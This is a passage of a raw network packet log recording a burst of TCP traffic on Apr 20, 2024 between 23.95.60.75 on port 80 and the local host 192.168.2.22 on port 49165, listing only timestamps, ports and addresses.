Apr 20, 2024 11:36:12.275717974 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275759935 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275779009 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.275799036 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275836945 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275850058 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.275876045 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275914907 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275935888 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.275954962 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275995970 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276025057 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276036978 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276077032 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276092052 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276146889 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276185989 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276202917 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276227951 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276264906 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276284933 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276303053 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276341915 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276362896 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276380062 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276417017 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276427984 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276454926 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276492119 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276509047 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276531935 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276567936 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276582003 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276607990 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276647091 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276674032 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276686907 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276727915 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276738882 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276766062 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276803017 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276825905 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276839972 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276878119 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276894093 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276917934 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276956081 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.276973009 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.276995897 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.277034998 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.277050972 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.277072906 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.277110100 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.277128935 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.277148008 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.277219057 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.277220011 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430303097 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430366039 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430406094 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430414915 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430448055 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430486917 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430497885 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430526972 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430565119 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430572033 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430607080 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430644989 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430660963 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430685043 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430723906 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430735111 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430763006 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430799961 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430807114 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430839062 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430876970 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430888891 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.430944920 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430982113 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.430994034 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431022882 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431062937 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431073904 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431112051 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431150913 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431160927 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431190014 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431226969 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431235075 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431265116 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431303024 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431313992 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431343079 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431384087 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431391001 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431421995 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431463957 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431473970 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431504011 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431540966 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431546926 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431580067 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431619883 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431631088 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431660891 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431699038 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431709051 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431737900 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431776047 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431786060 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431817055 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431854963 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431866884 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431894064 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431931019 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.431932926 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.431972027 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432010889 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432024956 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.432049990 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432085991 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432105064 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.432146072 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432183981 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432214022 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.432219982 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432257891 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432271957 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.432297945 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.432348013 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585352898 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585412979 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585453033 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585468054 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585498095 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585555077 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585561037 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585602999 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585642099 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585652113 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585681915 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585720062 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585738897 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585758924 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585796118 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585803986 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585839033 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585876942 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585886002 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585916042 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585953951 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.585961103 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.585993052 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586031914 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586045027 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586071014 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586087942 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586112976 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586153984 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586163998 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586190939 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586236954 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586246967 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586286068 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586323977 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586337090 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586365938 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586404085 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586409092 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586441994 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586483955 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586489916 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586523056 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586561918 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586570024 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586599112 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586637974 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586647034 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586690903 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586728096 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586739063 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586766005 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586806059 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586816072 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586844921 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586883068 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586898088 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586920977 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586957932 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.586966991 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.586997986 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587037086 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587042093 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.587076902 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587116957 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587126970 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.587157011 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587196112 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587202072 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.587234974 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587274075 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587285995 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.587312937 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587352991 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.587357044 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.740704060 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.740766048 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.740806103 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.740824938 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.740847111 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.740864038 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.740886927 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.740926981 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.740942955 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.740964890 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741003036 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741017103 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741045952 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741085052 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741094112 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741123915 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741163969 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741175890 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741202116 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741240025 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741245031 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741278887 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741317034 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741328955 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741358042 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741394997 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741401911 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741436958 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741473913 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741492987 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741509914 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741547108 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741566896 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741585016 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741621971 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741631031 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741661072 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741697073 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741707087 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741735935 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741774082 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741781950 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741816044 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741853952 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741866112 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741892099 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741931915 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.741954088 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.741971970 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742008924 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742018938 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742048025 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742085934 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742095947 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742125034 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742162943 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742172956 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742201090 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742240906 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742253065 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742290020 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742327929 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742341042 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742366076 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742403984 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742413998 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742441893 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742480040 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742495060 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742516994 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742557049 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742572069 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742594004 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742634058 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742649078 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742676020 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742712975 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742727041 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742752075 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742788076 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742800951 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742827892 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742865086 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742876053 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742903948 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742942095 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.742952108 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.742980003 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743019104 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743022919 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743057966 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743093967 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743103981 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743134022 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743171930 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743181944 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743210077 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743247032 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743254900 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743284941 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743324041 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743330956 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743364096 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743401051 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743412018 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743438959 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743477106 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743491888 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743514061 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743551016 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743554115 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743592978 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743629932 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743647099 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743669033 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743709087 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743721008 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743746996 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743784904 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743796110 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743822098 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743860960 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743874073 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.743901014 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743937016 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.743956089 CEST	49165	80	192.168.2.22	23.95.60.75
